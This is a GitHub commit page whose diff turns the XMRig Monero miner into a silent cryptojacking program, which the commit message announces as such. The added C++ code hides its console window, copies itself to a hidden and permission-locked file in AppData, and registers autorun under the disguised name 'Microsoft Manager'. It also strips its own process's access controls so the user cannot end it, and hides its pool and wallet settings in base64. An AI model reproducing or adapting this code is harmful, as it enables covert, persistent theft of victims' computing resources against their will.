fzorb/REDACTED-rig
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Fixed modrig and updated it here.

Browse source 
It is now a fully functioning silent XMR miner with base64 encoding.
This commit is contained in:
woah1337 2018-06-25 18:19:17 +05:30 committed by GitHub
parent 25dce61369
commit 1aca0eeb70
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 204 additions and 25 deletions
Download patch file Download diff file Expand all files Collapse all files

229
src/xmrig.cpp
View file

@ -1,31 +1,210 @@
/* XMRig #define _UNICODE
* Copyright 2010 Jeff Garzik <jgarzik@pobox.com>
* Copyright 2012-2014 pooler <pooler@litecoinpool.org>
* Copyright 2014 Lucas Jones <https://github.com/lucasjones>
* Copyright 2014-2016 Wolf9466 <https://github.com/OhGodAPet>
* Copyright 2016 Jay D Dee <jayddee246@gmail.com>
* Copyright 2016-2017 XMRig <support@xmrig.com>
*
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "App.h" #include "App.h"
#include <windows.h>
#include <TCHAR.H>
#include <thread>
#include <sddl.h>
#include <stdio.h>
#include <aclapi.h>
#include <stdlib.h>
#include <Shlwapi.h>
#define STRICT
#pragma comment(linker, "/MERGE:.data=.text")
#pragma comment(linker, "/MERGE:.rdata=.text")
#pragma comment(linker, "/SECTION:.text,EWR")
#define STRLEN(x)(sizeof(x) / sizeof(TCHAR) - 1)
int main(int argc, char **argv) { bool SelfDefense()
App app(argc, argv); {
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
SECURITY_ATTRIBUTES sa;
TCHAR * szSD = TEXT("D:P");
return app.exec(); sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = FALSE;
if (!ConvertStringSecurityDescriptorToSecurityDescriptor(szSD, SDDL_REVISION_1, &(sa.lpSecurityDescriptor), NULL))
return FALSE;
if (!SetKernelObjectSecurity(hProcess, DACL_SECURITY_INFORMATION, sa.lpSecurityDescriptor))
return FALSE;
return TRUE;
}
static const std::string base64_chars =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789+/";
static inline bool is_base64(unsigned char c) {
return (isalnum(c) || (c == '+') || (c == '/'));
}
std::string mov_eax_push_5012(std::string encoded_string) {
int in_len = encoded_string.size();
int i = 0;
int j = 0;
int in_ = 0;
unsigned char char_array_4[4], char_array_3[3];
std::string ret;
while (in_len-- && (encoded_string[in_] != '=') && is_base64(encoded_string[in_])) {
char_array_4[i++] = encoded_string[in_]; in_++;
if (i == 4) {
for (i = 0; i <4; i++)
char_array_4[i] = base64_chars.find(char_array_4[i]);
char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
for (i = 0; (i < 3); i++)
ret += char_array_3[i];
i = 0;
}
}
if (i) {
for (j = i; j <4; j++)
char_array_4[j] = 0;
for (j = 0; j <4; j++)
char_array_4[j] = base64_chars.find(char_array_4[j]);
char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
for (j = 0; (j < i - 1); j++) ret += char_array_3[j];
}
return ret;
}
int Delete(TCHAR* path) {
TCHAR DelCom[MAX_PATH + 1];
wsprintfW(DelCom, L"/c timeout -t 2 && del \"%s\"", path);
ShellExecuteW(0, L"open", L"cmd.exe", DelCom, 0, SW_HIDE);
std::exit(0);
}
int Copy(TCHAR* CopyPth, TCHAR* CruPath, TCHAR* Username) {
STARTUPINFO si;
TCHAR CACLS[1024];
TCHAR CACLS2[1024];
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
PROCESS_INFORMATION pi;
memset(&pi, 0, sizeof(pi));
CopyFile(CruPath, CopyPth, true);
SetFileAttributes(CopyPth, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
wsprintfW(CACLS, L"/c CACLS \"%s\" /E /P %s:N", CopyPth, Username); // Protect this fucking file
ShellExecuteW(0, L"open", L"cmd.exe", CACLS, 0, SW_HIDE);
wsprintfW(CACLS2, L"/c Echo Y| CACLS \"%s\" /P %s:R", CopyPth, Username);
ShellExecuteW(0, L"open", L"cmd.exe", CACLS2, 0, SW_HIDE); // End protect, lazy to comment this shit method ;-)
CreateProcess(NULL, CopyPth, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
Delete(CruPath);
}
int CheckMutex() {
WCHAR MUTEX[] = { L"Global\\Mutex01"};
HANDLE hMutex = CreateMutexW(0, 0, MUTEX);
if ((GetLastError() == ERROR_ALREADY_EXISTS) || (GetLastError() == ERROR_ACCESS_DENIED)) {
CloseHandle(hMutex);
std::exit(0);
}
return 0;
}
BOOL IsElevated() {
BOOL fRet = FALSE;
HANDLE hToken = NULL;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
TOKEN_ELEVATION Elevation;
DWORD cbSize = sizeof(TOKEN_ELEVATION);
if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
fRet = Elevation.TokenIsElevated;
}
}
if (hToken) {
CloseHandle(hToken);
}
return fRet;
}
int AutoRun(TCHAR* path, BOOL Admin) {
HKEY hKey = NULL;
HKEY hKey2 = NULL;
LONG lResult = 0;
if (Admin) { // If user admin, set hidden auto run. I am to lazy for comment this step
lResult = RegOpenKey(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", &hKey2);
if (ERROR_SUCCESS != lResult) {
RegCreateKey(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", &hKey2);
}
RegOpenKey(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", &hKey2);
RegSetValueEx(hKey2, L"Microsoft Manager", 0, REG_SZ, (PBYTE)path, lstrlen(path) * sizeof(TCHAR) + 1);
RegCloseKey(hKey2);
} else { // But if user not admin, set standart method
RegOpenKey(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &hKey);
RegSetValueEx(hKey, L"Microsoft Manager", 0, REG_SZ, (PBYTE)path, lstrlen(path) * sizeof(TCHAR) + 1);
RegCloseKey(hKey);
}
return 0;
}
int CheckPath() {
TCHAR Username[256]; // To protect file
TCHAR AppData[1024 + 1]; // Drop path var
BOOL Admin = IsElevated(); // Admin? true/false
TCHAR CruPath[MAX_PATH + 1]; // Current path var
ExpandEnvironmentStringsW(L"%USERNAME%", Username, 256); // Windows username
ExpandEnvironmentStringsW(L"%APPDATA%\\WMA.exe", AppData, 1024); // Full drop path
GetModuleFileName(NULL, CruPath, STRLEN(CruPath)); // Current file path
if (_tcscmp(CruPath, AppData) != 0) { // Current path is appdata?
AutoRun(AppData, Admin); // If no set autorun
Copy(AppData, CruPath, Username); // And drop file
} else { // Or
CheckMutex(); // Doublerun?
if (SelfDefense()) {} // Fuck user
return 0;
}
}
//If u need id to worker
char* WorkerID() {
DWORD VolumeSerialNumber = 0;
GetVolumeInformation(L"c:\\", NULL, NULL, &VolumeSerialNumber, NULL, NULL, NULL, NULL);
char procID[20];
sprintf(procID, "%d", VolumeSerialNumber);
return procID;
}
int main() {
ShowWindow(GetConsoleWindow(), SW_HIDE); // hide console
CheckPath();
char *frst = new char[mov_eax_push_5012("RmlsbGVlZQ==").length() + 1];
strcpy(frst, mov_eax_push_5012("RmlsbGVlZQ==").c_str());
char *scnd = new char[mov_eax_push_5012("LW8=").length() + 1];
strcpy(scnd, mov_eax_push_5012("LW8=").c_str());
char *mkdjd = new char[mov_eax_push_5012("LXU=").length() + 1];
strcpy(mkdjd, mov_eax_push_5012("LXU=").c_str());
//Pool in base64
char *urejds = new char[mov_eax_push_5012("PASTE HERE").length() + 1];
strcpy(urejds, mov_eax_push_5012("PASTE HERE").c_str());
//Wallet in base64
char *mkwei3 = new char[mov_eax_push_5012("WALLET HERE").length() + 1];
strcpy(mkwei3, mov_eax_push_5012("WALLET HERE").c_str());
static char * dreams[] = { frst, scnd, urejds, mkdjd, mkwei3 };
App FUcker(5, dreams);
return FUcker.exec();
} }